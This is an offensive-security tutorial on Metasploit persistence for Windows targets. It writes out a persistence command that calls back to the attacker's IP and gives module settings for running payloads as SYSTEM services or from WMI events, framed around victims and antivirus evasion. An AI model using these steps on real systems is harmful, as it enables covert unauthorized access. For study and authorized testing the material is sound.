Maintaining access to a target machine after the initial exploitation is a vital phase known as persistence. Without it, you would lose your connection if the victim reboots their computer or if the network connection is interrupted. Metasploit provides several automated modules to ensure your Meterpreter session remains active across system restarts.
The most common method for Windows targets is using the persistence module. From an active Meterpreter session, you can use the command run persistence -U -i 5 -p 4444 -r [Your IP]. The -U flag ensures the backdoor starts when a user logs in, the -i 5 flag tells the payload to attempt a reconnection every five seconds, and the -r flag specifies your listener IP. This module creates a registry key in the “Run” hive and uploads a VBScript payload to the target’s temporary directory.
Another effective method is the persistence_exe module. Unlike the script-based approach, this module allows you to upload a custom executable and set it to run as a system service. To use this, background your current session and type use post/windows/manage/persistence_exe. Set the SESSION variable to your active session ID and the REXEPATH to the location of your Veil-generated undetectable payload. By setting STARTUP to SERVICE, the payload will execute even before a user logs in, providing a high-level SYSTEM-level connection.
For modern Windows environments, WMI (Windows Management Instrumentation) persistence is often preferred because it does not rely on traditional registry keys or files that antivirus software frequently monitors. Using the post/windows/manage/wmi_persistence module, you can trigger your payload based on a specific event, such as a system uptime reaching a certain threshold. Regardless of the method used, always ensure you have a Metasploit multi/handler running on your attack machine to receive the persistent connection whenever it triggers.
